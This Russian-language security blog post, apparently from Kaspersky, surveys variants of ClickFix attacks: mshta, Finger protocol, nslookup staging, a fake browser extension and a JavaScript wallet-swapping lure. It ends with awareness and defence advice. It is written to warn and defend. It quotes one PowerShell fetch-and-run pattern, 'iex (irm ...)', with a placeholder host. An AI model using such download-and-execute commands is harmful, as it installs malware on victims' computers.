Вариации на тему ClickFix

Примерно год назад мы публиковали пост про набирающую у злоумышленников популярность технику ClickFix. Суть атак с применением ClickFix сводится к тому, что жертву под разными предлогами убеждают выполнить вредоносную команду на собственном компьютере. То есть с точки зрения защитных решений запускается она от лица активного пользователя и с его привилегиями.

В первых применениях этой тактики злоумышленники в основном убеждали жертв скопировать строку в меню «Выполнить» и нажать «Ввод», чтобы что-то починить или чтобы пройти капчу, а сама строка в подавляющем большинстве случаев была скриптом PowerShell. Однако с тех пор злоумышленники придумали ряд новых уловок, о которых стоит предупредить пользователей, и ряд новых вариантов доставки вредоносной нагрузки, которые имеет смысл отслеживать.

Использование mshta.exe

Эксперты Microsoft в прошлом году публиковали отчет о кибератаках, ориентированных на владельцев гостиниц, работающих с Booking.com. Атакующие рассылали фальшивые нотификации от сервиса или письма от постояльцев, обращающих внимание на «странный отзыв». В обоих случаях в письме содержится ссылка якобы на сайт Booking.com, при переходе по которой жертве предлагали доказать, что она не робот, запустив некий код через меню «Выполнить».

Принципиальное отличие этой атаки от базового применения ClickFix заключается в двух нюансах. Во-первых, пользователя не просили скопировать строку (все-таки строка с кодом иногда вызывает подозрение). Она сама копировалась в буфер, вероятно, при нажатии на чекбокс, имитирующий механизм проверки reCAPTCHA. Во-вторых, вредоносная команда запускала легитимную системную утилиту mshta.exe, позволяющую выполнять приложения, написанные на языке HTML. Она успешно обращалась к серверу злоумышленников, адрес которого содержался в той же строке, и запускала установку основной вредоносной нагрузки.

Видео в TikTok и PowerShell от имени администратора

В издании BleepingComputer был опубликован материал, в котором рассказывалось о кампании по распространению вредоносных программ через инструкции в роликах TikTok. В роликах выдавались советы по бесплатной активации проприетарного ПО, которые сводились к необходимости запуска оболочки PowerShell с правами администратора и выполнению в ней строки iex (irm {вредоносный адрес}). Команда irm служит для скачивания вредоносного скрипта с сервера, контролируемого злоумышленниками, а команда iex (Invoke-Expression) — для дальнейшего его запуска. Скрипт, в свою очередь, скачивал на компьютер жертвы инфостилер.

Использование протокола Finger

Еще один необычный вариант ClickFix-атаки использует уже знакомую уловку с прохождением капчи, однако при этом вредоносная нагрузка скачивается через устаревший сетевой протокол Finger. Одноименная утилита позволяет запросить данные о конкретном пользователе на удаленном сервере. В настоящее время протокол почти не используется, но поддерживается как в Windows, так и в macOS, а также в ряде систем на базе Linux.

Пользователя убеждают открыть интерфейс командной строки и через него запустить команду, устанавливающую соединение по протоколу Finger (используя 79-й порт TCP) с сервером злоумышленников. Протокол подразумевает передачу только текстовой информации, но этого вполне достаточно, чтобы доставить в ответе на запрос еще один скрипт, который, в свою очередь, при запуске устанавливает вредоносное ПО.

Вариант CrashFix

Еще один вариант использования ClickFix отличается как раз более сложной социальной инженерией. Он применялся в атаке на пользователей, пытающихся найти инструмент для блокировки рекламных баннеров, трекеров, зловредов и другого нежелательного контента на веб-страницах. При поиске подходящего для этих целей расширения для Google Chrome пользователи находили некий NexShield — Advanced Web Guardian, который по факту был клоном реально работающей программы, но в какой-то момент нарушал работу браузера и выводил фальшивую нотификацию об обнаруженной проблеме с безопасностью и необходимости запустить «сканирование», чтобы исправить ошибку. Если пользователь соглашался, ему выдавали инструкцию по вызову меню «Выполнить» и запуску команды, которую расширение предварительно помещало в буфер обмена.

Запуск команды копировал уже знакомый нам файл finger.exe во временную директорию, переименовывал его в ct.exe, а затем запускал с адресом злоумышленника. Далее атака не отличалась от предыдущего варианта. В качестве ответа на запрос по протоколу Finger доставлялся вредоносный скрипт, который запускался и устанавливал троян удаленного доступа (в данном случае это был ModeloRAT).

Обращение к DNS-серверу

Команда Microsoft Threat Intelligence также поделилась чуть более сложным, чем обычно, вариантом атаки. Используемая в ней социнженерная уловка, к сожалению, неизвестна, но метод доставки вредоносной нагрузки весьма интересен. Вероятно, для того чтобы усложнить детектирование атаки в корпоративном окружении и продлить жизнь вредоносной инфраструктуре, атакующие использовали дополнительный шаг: обращение к контролируемому злоумышленниками DNS-серверу.

То есть после того, как жертву каким-либо образом убеждали скопировать и выполнить вредоносную команду, от имени пользователя происходило обращение к DNS-серверу через легитимную утилиту nslookup, запрашивающее данные для домена example.com. Причем в команде был зашит адрес конкретного DNS-сервера, контролируемого атакующими. Сервер выдавал ответ, в котором, помимо всего прочего, содержится вредоносный скрипт, в свою очередь скачивавший финальную вредоносную нагрузку (в данной атаке опять ModeloRAT).

Криптовалютная приманка и JavaScript в качестве нагрузки

Следующий вариант атаки, наоборот, интересен многоступенчатой социальной инженерией. В комментариях на Pastebin злоумышленники активно распространяли сообщение о якобы существующей технической недоработке криптовалютного обменника Swapzone.io. Владельцам криптовалюты предлагалось перейти на созданный мошенниками ресурс, где содержалась полноценная инструкция по эксплуатации этой недоработки, что может принести до $13 000 за пару дней.

В инструкции объяснялось, как из-за недоработок сервиса можно обменивать криптовалюту по более выгодному курсу. Для этого необходимо открыть сайт сервиса в браузере Chrome, руками написать в адресной строке «javascript:», а затем вставить скопированный на сайте злоумышленников сценарий на JavaScript и выполнить его. В реальности скрипт, конечно, никак не мог повлиять на курсы обмена, он просто подменял адреса кошельков Bitcoin и, если жертва действительно пробовала что-то обменять, уводил средства на счета организаторов атаки.

Как защитить компанию от ClickFix-атак

От простейших атак, использующих технику ClickFix, можно защититься, заблокировав на рабочих устройствах сочетание клавиш [Win] + [R]. Но, как мы видим из вышеперечисленных примеров, это далеко не единственный вариант атаки, в которой пользователя просят самостоятельно запустить вредоносный код.

Поэтому основной совет — повышать осведомленность сотрудников о современных киберугрозах. Они должны четко понимать, что если кто-то просит провести какие-либо необычные манипуляции с системой, скопировать и вставить куда-то код, то это в большинстве случаев уловка киберпреступников. Организовать повышение ИБ-грамотности можно при помощи автоматизированной образовательной платформы Kaspersky Automated Security Awareness Platform.

Помимо этого, для защиты от атак мы рекомендуем:

• Использовать надежную защиту на всех корпоративных устройствах.
• Отслеживать подозрительную активность в сети компании с помощью решения класса XDR.
• В случае нехватки внутренних ресурсов пользоваться услугами внешнего сервиса для поиска угроз и оперативного реагирования на них.